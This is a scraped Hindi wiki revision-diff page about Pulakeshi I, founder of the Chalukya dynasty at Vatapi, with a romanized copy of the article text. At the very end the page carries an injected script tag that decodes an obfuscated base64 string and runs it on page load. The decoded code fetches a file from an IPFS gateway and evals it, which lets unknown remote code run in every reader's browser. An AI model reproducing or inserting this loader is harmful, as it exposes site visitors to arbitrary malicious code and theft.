Difference between revisions of "पुलकेशी प्रथम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " भारत " to " भारत ")
Line 1: Line 1:
पुलकेशी प्रथम दक्षिण में [[वातापी कर्नाटक|वातापी]] में [[चालुक्य वंश]] का प्रवर्तक था। वह छठी शताब्दी के लगभग मध्यकाल में हुआ था।
+
*पुलकेशी प्रथम दक्षिण में [[वातापी कर्नाटक|वातापी]] में [[चालुक्य वंश]] का प्रवर्तक था।  
[[Category:दक्षिण [[भारत]] के साम्राज्य]][[Category:इतिहास कोश]] __INDEX__
+
*दक्षिणापथ में [[चालुक्य वंश]] के राज्य की स्थापना छठी सदी के मध्य भाग में हुई, जब कि [[गुप्त साम्राज्य]] का क्षय प्रारम्भ हो चुका था।
 +
*पुरानी अनुश्रुति के अनुसार चालुक्य लोग उत्तरी भारत के निवासी थे, और किसी समय उन्होंने [[अयोध्या]] में शासन किया था।
 +
*उनका प्राचीन इतिहास अन्धकार में है, पर यह निश्चित है, कि 543 ई. तक पुलकेशी नामक चालुक्य राजा [[वातापी कर्नाटक|वातापी]] (बीजापुर ज़िले में, बादामी) को राजधानी बनाकर अपने पृथक व स्वतंत्र राज्य की स्थापना कर चुका था।
 +
*उसने वातापी के समीपवर्ती प्रदेशों को जीत कर अपनी शक्ति का विस्तार किया था, और उसी उपलक्ष्य में [[अश्वमेध यज्ञ]] भी किया था। इस यज्ञ के अनुष्ठान से सूचित होता है, कि वह अच्छा प्रबल और दिग्विजयी राजा था।
 +
 
 +
 
 +
 
 +
 
 +
 
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{चालुक्य राजवंश}}
 +
{{भारत के राजवंश}}
 +
[[Category:नया पन्ना]]
 +
[[Category:इतिहास_कोश]]
 +
[[Category:दक्षिण भारत के साम्राज्य]]
 +
[[Category:चालुक्य साम्राज्य]]
 +
[[Category:भारत के राजवंश]]
 +
__INDEX__

Revision as of 10:21, 30 September 2010

  • pulakeshi pratham dakshin mean vatapi mean chaluky vansh ka pravartak tha.
  • dakshinapath mean chaluky vansh ke rajy ki sthapana chhathi sadi ke madhy bhag mean huee, jab ki gupt samrajy ka kshay prarambh ho chuka tha.
  • purani anushruti ke anusar chaluky log uttari bharat ke nivasi the, aur kisi samay unhoanne ayodhya mean shasan kiya tha.
  • unaka prachin itihas andhakar mean hai, par yah nishchit hai, ki 543 ee. tak pulakeshi namak chaluky raja vatapi (bijapur zile mean, badami) ko rajadhani banakar apane prithak v svatantr rajy ki sthapana kar chuka tha.
  • usane vatapi ke samipavarti pradeshoan ko jit kar apani shakti ka vistar kiya tha, aur usi upalakshy mean ashvamedh yajn bhi kiya tha. is yajn ke anushthan se soochit hota hai, ki vah achchha prabal aur digvijayi raja tha.




panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

Template:chaluky rajavansh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>